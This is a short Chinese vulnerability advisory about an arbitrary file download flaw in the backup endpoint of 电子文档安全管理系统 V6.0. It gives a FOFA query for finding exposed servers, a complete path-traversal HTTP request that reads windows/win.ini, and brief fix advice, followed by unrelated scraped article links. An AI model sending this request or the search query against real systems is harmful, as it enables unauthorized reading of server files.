电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

电子文档安全管理系统 V6.0 resources/backup存在任意文件下载漏洞,攻击者可通过该漏洞获取服务器所有文件信息。

搜索语法

FOFA:body="docsafe/docsafe.nocache.js"

漏洞再现

GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1

Host:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br, zstd

Accept-Language: zh-CN,zh;q=0.9

Connection: keep-alive

修复建议

禁用特殊字符,限制文件读取路径。关注厂商官网信息,及时更新版本

相关推荐
搬砖工程师Cola25 分钟前
<C#>.NET WebAPI 的 FromBody ,FromForm ,FromServices等详细解释
开发语言·c#·.net
0白露31 分钟前
设计模式之工厂方法模式
java·python·设计模式·php·工厂方法模式
triticale31 分钟前
【数论】快速幂
java·算法
爱的叹息1 小时前
【java实现+4种变体完整例子】排序算法中【计数排序】的详细解析,包含基础实现、常见变体的完整代码示例,以及各变体的对比表格
java·算法·排序算法
bl4ckpe4ch2 小时前
【漏洞复现】CVE-2024-38856(ApacheOfbiz RCE)
网络安全·漏洞复现
李长渊哦2 小时前
深入理解 JavaScript 中的全局对象与 JSON 序列化
开发语言·javascript·json
若水晴空初如梦3 小时前
QT聊天项目DAY06
开发语言·qt
曼岛_4 小时前
[安全实战]逆向工程核心名词详解
安全·逆向工程
h汉堡4 小时前
C++入门基础
开发语言·c++·学习
橘猫云计算机设计4 小时前
基于Springboot的自习室预约系统的设计与实现(源码+lw+部署文档+讲解),源码可白嫖!
java·spring boot·后端·毕业设计